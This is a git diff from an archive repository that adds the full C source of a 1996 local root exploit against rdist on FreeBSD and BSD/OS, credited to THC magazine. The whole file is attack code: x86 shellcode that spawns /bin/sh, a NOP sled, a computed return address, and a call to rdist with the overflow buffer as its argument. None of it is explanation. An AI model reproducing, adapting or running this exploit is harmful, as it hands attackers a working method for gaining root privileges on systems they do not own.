--- /dev/null
+/*
+ * rdist exploit for freebsd & bsd/os x86 2.0
+ * discovered by brian mitchell
+ * coded by plasmoid/thc/deep for thc-magazine issue #3
+ * 12/12/96
+ */
+
+#include <stdio.h>
+
+#define lv_size 256
+#define offset 30+lv_size+8*4
+
+long get_sp()
+{
+ __asm__("movl %esp, %eax");
+}
+
+
+main(int argc, char **argv)
+{
+ char execshell[] =
+ "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
+ "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
+ "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
+ "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
+
+ char buffer[lv_size + 4 * 8];
+ unsigned long *ptr2 = NULL;
+ char *ptr = NULL;
+ int i;
+
+ for (i = 0; i < lv_size + 4 * 8; i++)
+ buffer[i] = 0x00;
+
+ ptr = buffer;
+ for (i = 0; i < lv_size - strlen(execshell); i++)
+ *(ptr++) = 0x90;
+
+ for (i = 0; i < strlen(execshell); i++)
+ *(ptr++) = execshell[i];
+
+ ptr2 = (long *) ptr;
+ for (i = 1; i < 2; i++)
+ *(ptr2++) = get_sp() + offset;
+
+ printf("discovered by brian mitchell\n"
+ "coded by plasmoid/thc/deep\n" "for thc-magazine issue #3\n");
+
+ execl("/usr/bin/rdist", "rdist", "-d", buffer, "-d", buffer, NULL);
+}
projects / oweals / thc-archive.git / blobdiff